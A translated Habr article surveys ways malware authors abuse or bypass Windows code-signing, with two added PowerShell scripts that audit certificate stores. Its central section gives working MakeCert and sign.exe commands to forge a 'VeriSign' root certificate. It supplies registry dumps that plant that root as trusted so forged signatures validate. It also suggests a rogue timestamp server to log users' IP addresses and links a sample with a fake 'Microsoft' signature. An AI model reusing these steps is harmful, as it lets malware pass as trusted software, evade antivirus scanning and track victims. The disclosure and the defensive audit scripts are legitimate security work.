
Hello, Habr!
First of all, it looks like the karma problem somehow got solved. That has nothing to do with the topic at hand and only explains the particular delay in this piece appearing (it was originally planned for November of last year).
Today I offer a small review of the digital signature system for executable files and of the ways it can be bypassed and abused. One very effective bypass will be examined in detail. Even though the points described are already several months old, by no means everyone knows about them. The vendors of the products discussed below have been notified of the material described here, so fixing these problems, if they chose to take them into account, is their responsibility: they had enough time.
Theory
The idea and technology of digitally signing executable files date back to the Windows NT era. Since the arrival of Windows Vista, Microsoft has run an active campaign to promote the technology. In the vendor's view, signed code can only come from a trusted author of that code and is therefore guaranteed not to harm the system (three times ha).
However, because the signing mechanism usually relies on fairly complex cryptography, general trust in signed code has spread widely. Antivirus vendors did not miss this either: if code is signed, it is obviously not a virus and can be trusted a priori, which lowers the chance of false positives. So most modern antivirus products skip checking signed files by default, which speeds up scanning and reduces false positives. On top of that, signed programs are in many cases automatically placed in the "trusted" category of behaviour analysis.
It becomes clear that by signing their creations with a valid signature, virus writers gain a fairly large number of victims whose active, regularly updated antivirus will nevertheless let the infection through. Obviously this is a very tasty morsel, which is easy to see in the example of the already famous Stuxnet virus, whose code was signed with a valid Realtek certificate (a later signature from JMicron was also reported).
But this approach has a flip side: as soon as a compromised signature is identified, the signature itself becomes something AV vendors can detect on, giving a 100% response. Given that obtaining a genuine certificate for signing is quite expensive, virus writers are clearly interested in a complete bypass of the signature verification mechanism, without a valid private key, or by generating such a key on their own. This would not only bypass antivirus protection but also allow installing drivers and ActiveX components without warnings, and open the door to the x64 world, where normally nothing unsigned can be installed.
But more on that in practice.
Practice
One of the greats said that to defeat your enemy you must start thinking like him. So, if we were virus writers, what could we do?
1. Copy the certificate information from a clean file.
At the moment this is the most common method. The signature information, right down to the chain of trusted issuers, is copied in every detail. Obviously such a copy is only valid in the user's eyes. However, what the OS displays may confuse an inexperienced person and be perceived as just another glitch: if all the issuers are correct, why is this signature invalid? Ah well, just one of those things.
2. Use a self-signed certificate with a fake name.
Similar to the option above, but differs in that the certificate path chain is not copied.
3. Fake MD5.
Despite the fact that the weaknesses of the MD5 algorithm have been described for a long time (here and here), it is still frequently used in digital signatures. However, the practical examples of MD5 collisions either involve very small files or lead to code that malfunctions. In practice no virus with a forged, collision-based MD5 signature has been found, but nevertheless the method is theoretically possible.
4. Obtain a certificate through the normal procedure and use it for malicious purposes.
This is one of the most common methods among authors of riskware, adware and fake antiviruses. As an example, the fake Perfect Defender (the standard scam: free scan, you're infected, pay us and we'll remove it) exists with the signatures of several firms:
• Jeansovet llc
• Perfect Software llc
• Sovinsky llc
• Trambambon llc
How this is done could be explained by our domestic winlocker developers, who write a little letter about a "joke program" and the like, and are thereby protected from a fraud charge. And so we live on...
Interestingly, there are perfectly ordinary programs with the following owner names:
• Verified Software
• Genuine Software Update Limited
• Browser Plugin
Clearly, if you really believe that, it is not hard to be fooled by a glance at the certificate.
Also note that obtaining a signature from a certificate authority is not difficult at all. For example, RapidSSL uses only e-mail for verification: if the request comes from an address such as admin, administrator, hostmaster, info, is, it, mis, postmaster, root, ssladmin, ssladministrator, sslwebmaster, sysadmin or webmaster@somedomain.com, then obviously it is the domain owner writing, right? (three more ha's). Furthermore, the well-known company Digital River (DR), which provides outsourcing and e-commerce, usually issues certificates to all of its customers. No wonder that MSNSpyMonitor, WinFixer, QuickKeyLogger, ErrorSafe, ESurveiller, SpyBuddy, TotalSpy, Spynomore, Spypal, and in general about 0.6% of all signed DR files are junk, and more than 5% of all signed DR files are potentially unwanted.
In fairness, note that signing x64 drivers is by no means simple, and in that case no abuses have been observed so far.
5. Find an employee of a trusted company and ask them to sign the code.
No comment. Everyone loves money; the only question is the amount :)
6. Steal certificates.
At present there are three large families of trojans honed specifically for stealing certificates. They are:
• Adrenalin
• Ursnif
• Zeus
• SpyEye (possibly)
Nevertheless, no large-scale cases of certificates stolen by new versions of these trojans being used have been noticed so far. Perhaps it's an ace up the sleeve? Time will tell...
7. Infect a trusted developer's build system and insert malicious code into the release before signing.
A textbook example of such an infection is the concept of the Induc.a virus. The virus infects the development system and injects its code at the compilation stage. As a result, the developer does not know that an invisible "appendage" has appeared in their program. The release passes signing and gets a fully legitimate certificate. Did you see it? And yet there it is! ;)
Fortunately, Induc.a is only a PoC: it merely infects development systems, without implementing any additional malicious functionality.
And now, the promised "candy".
The vulnerability, or how to get around it
As you can see, there are many ways to get around signatures. In this example we will look at a modified version of options 1 and 2 above.
So, what do we need?
- MakeCert.exe
- cert2spc.exe
- sign.exe
- ruki.sys
- mozg.dll
I don't think finding these components will be hard, but for the laziest I am posting the first three here. Given their tight binding to the hardware and the complete lack of cross-platform support and code portability, the last two I am not posting :)
So, let's create a trusted-issuer certificate of sorts, copying as much information as possible from VeriSign itself:
MakeCert.exe -# 7300940696719857889 -$ commercial -n CN="VeriSign Class 3 Code Signing 2009-2 CA" -a sha1 -sky signature -l "https://www.verisign.com/rpa" -cy authority -m 12 -h 2 -len 1024 -eku 1.3.6.1.5.5.7.3.2,1.3.6.1.5.5.7.3.3 -r -sv veri.pvk veri.cer
As a result of running this we get veri.pvk and veri.cer, suitable for signing.
Next, create a child certificate using what we have just obtained:
MakeCert.exe -# 8928659211875058207 -$ commercial -n CN="Home Sweet Home" -a sha1 -sky signature -l "http://habrahabr.ru/" -ic veri.cer -iv veri.pvk -cy end -m 12 -h 2 -len 1024 -eku 1.3.6.1.5.5.7.3.3 -sv kl.pvk kl.cer
As a result we have kl.pvk and kl.cer: a "trusted" certificate from an untrusted issuer. You can fool a naive user and extend the chain as long as you like, but the outcome is the same: because there is one untrusted element in the chain, the certificate is invalid. Right?
In Windows, any certificate, including a self-signed one, can be installed as trusted. This is convenient: in some cases a developer can create their own self-signed certificate, add it to the trusted certificates and calmly work with their application. In our case it is doubly convenient, because such an entry is evidently a simple write of information into the registry, and the information is not specific to a particular system.
After installing a registry monitor on a test virtual machine, we add the required "VeriSign" certificate to the trusted ones, track where the changes occur, and voilà! The corresponding registry branch can be dumped and placed in the installer. In total, the installer writes the registry information, the primary issuer's certificate automatically becomes trusted, and the whole chain validates.
So as not to lay all the cards on the table, I will only say that in my case the registry dump looked like this:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A61F9F1A51BBCA24218F9D14611AFBA61B86C14C]
"Blob"=hex:04,00,00,.....
Or, for the current user only:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates\A61F9F1A51BBCA24218F9D14611AFBA61B86C14C]
"Blob"=hex:04,00,00,.....
Once this data is written to the registry, a program with the fake signature chain automatically passes the sigverif.exe check. Well, signing the code with the resulting certificate is trivial in general, and it all fits in a single file:
cert2spc.exe kl.cer kl.spc
sign.exe -spc kl.spc -v kl.pvk -n "My Installer" -i "http://habrahabr.ru" -ky signature -$ commercial -a sha1 -t "http://timestamp.verisign.com/scripts/timstamp.dll" myprogram.exe
del kl.spc
Note the use of the timestamp server timestamp.verisign.com/scripts/timstamp.dll: in theory nothing prevents using your own server on your own domain, which would let you obtain the IP address every time someone's computer checks the program's signature, along with the time. Convenient, isn't it? ;)
Interestingly, at the time the material was written (October-November 2010), Kaspersky Internet Security 2011 did not monitor these particular registry branches, leaving chain validation to the OS. I don't know about now; it seems some branches are blocked... check and report back!
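The registry branches just mentioned back two certificate stores: the per-user Root store, which can be written without elevation, and the machine AuthRoot store. The following PowerShell audit is an added example, not code from the original article: it compares those stores (and the machine Root store) against a thumbprint baseline exported from a known-clean machine and reports every certificate the baseline does not know, together with the registry key it lives in. The function names, the baseline file format and its path are assumptions of this example.

```powershell
# Added example (not from the original article). Baseline file: one SHA-1
# thumbprint per line, produced on a clean reference machine with
#   Get-ChildItem Cert:\LocalMachine\Root, Cert:\LocalMachine\AuthRoot |
#       Select-Object -ExpandProperty Thumbprint | Set-Content baseline.txt

function Get-StoreRegistryPath {
    # Map a PowerShell certificate store to the registry key that backs it,
    # i.e. the keys the article's .reg dumps write to.
    param([string]$Location, [string]$StoreName)
    if ($Location -eq 'CurrentUser') {
        "HKCU:\Software\Microsoft\SystemCertificates\$StoreName\Certificates"
    } else {
        "HKLM:\SOFTWARE\Microsoft\SystemCertificates\$StoreName\Certificates"
    }
}

function Find-UnexpectedRoots {
    param(
        [Parameter(Mandatory)][string]$BaselinePath,
        # Per-user Root is writable without elevation; AuthRoot is rarely inspected.
        [string[]]$Stores = @('Cert:\CurrentUser\Root',
                              'Cert:\LocalMachine\AuthRoot',
                              'Cert:\LocalMachine\Root')
    )
    # Known-good thumbprints, upper-cased so they match the provider's format.
    $baseline = @{}
    Get-Content $BaselinePath | ForEach-Object { $baseline[$_.Trim().ToUpper()] = $true }

    foreach ($store in $Stores) {
        $parts = $store -split '\\'        # 'Cert:', 'CurrentUser', 'Root'
        foreach ($cert in Get-ChildItem $store) {
            if ($baseline.ContainsKey($cert.Thumbprint)) { continue }
            # Anything self-issued in a root store is a trust anchor; a
            # "VeriSign"-looking subject the baseline has never seen is exactly
            # the artefact the .reg dumps above produce.
            [pscustomobject]@{
                Store       = $store
                Thumbprint  = $cert.Thumbprint
                Subject     = $cert.Subject
                SelfSigned  = ($cert.Subject -eq $cert.Issuer)
                NotBefore   = $cert.NotBefore
                RegistryKey = Join-Path (Get-StoreRegistryPath $parts[1] $parts[2]) $cert.Thumbprint
            }
        }
    }
}

# Usage:
#   Find-UnexpectedRoots -BaselinePath .\baseline.txt | Format-Table -AutoSize
```

The baseline approach is deliberate: the machine Root and AuthRoot stores legitimately differ between Windows versions and patch levels, so a diff against a reference machine of the same build is far less noisy than any fixed list of "good" CA names, and it does not matter what name the injected anchor pretends to carry.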
It should be noted that for signing one can also use certain software that is not publicly available. Obviously it does not break the signature, but what gets entered in the X500 fields offers even more flexibility. Here the curious can download an example: an archive with files of the popular Notepad replacement bred3_2k (offsite), with and without a "Microsoft" signature :) For the signature to become fully valid it is enough to apply the registry changes contained in the key+.reg file; likewise, the key-.reg file reverts those changes. Follow the certificate path, the curious will enjoy it :)
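To "follow the certificate path" of a file like the one above, here is an added PowerShell check (not part of the original article or of bred3_2k): it reads the file's Authenticode signature, builds the chain the way the OS does, and reports which stores contain the chain's root. A root present only in the per-user Root store is exactly what the key+.reg trick produces, while a HashMismatch status is what the "copied signature" approach from item 1 yields. Function and parameter names are assumptions of this example.

```powershell
# Added example (not from the original article): where does the signer's
# chain actually terminate, and which store makes that root "trusted"?

function Test-SignerRoot {
    param([Parameter(Mandatory)][string]$Path)

    $sig = Get-AuthenticodeSignature -FilePath $Path
    if ($null -eq $sig.SignerCertificate) {
        # NotSigned, or the signature block is unreadable: nothing to chain.
        return [pscustomobject]@{ File = $Path; Status = $sig.Status; Signer = $null
                                  Root = $null; RootStores = @(); UserStoreOnly = $false }
    }

    # Build the chain as the OS would; elements are filled in even if Build() fails.
    $chain = New-Object System.Security.Cryptography.X509Certificates.X509Chain
    $chain.ChainPolicy.RevocationMode = 'NoCheck'   # offline check, only the anchor matters here
    $null = $chain.Build($sig.SignerCertificate)
    $root = $chain.ChainElements[$chain.ChainElements.Count - 1].Certificate

    # Which stores hold that root? The per-user store needs no elevation to write.
    $stores = @()
    foreach ($store in 'Cert:\LocalMachine\Root', 'Cert:\LocalMachine\AuthRoot', 'Cert:\CurrentUser\Root') {
        if (Get-ChildItem $store | Where-Object { $_.Thumbprint -eq $root.Thumbprint }) {
            $stores += $store
        }
    }

    [pscustomobject]@{
        File          = $Path
        Status        = $sig.Status        # Valid, NotSigned, HashMismatch, NotTrusted, UnknownError
        Signer        = $sig.SignerCertificate.Subject
        Root          = $root.Subject
        RootStores    = $stores
        # Trusted solely because of a user-writable store: the article's HKCU variant.
        UserStoreOnly = ($stores.Count -eq 1 -and $stores[0] -eq 'Cert:\CurrentUser\Root')
    }
}

# Usage:
#   Test-SignerRoot -Path .\myprogram.exe | Format-List
```

A root reported only under Cert:\LocalMachine\AuthRoot (the article's HKLM variant) is not suspicious on its own, because Windows delivers many legitimate roots there; that case is what the thumbprint-baseline comparison above is for.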
I will additionally point out that the author of the "example" registered his own timestamp server, which lets the author learn the IP address of anyone handling it. If you like, you can track these requests and report in the comments ;)
If there is interest, the next article will describe how to configure protection of the corresponding registry branches so that certificates cannot be planted among the trusted ones. Write in the comments; this vulnerability may already have been fixed.
This article used materials from a presentation by Jarno Niemela (F-Secure).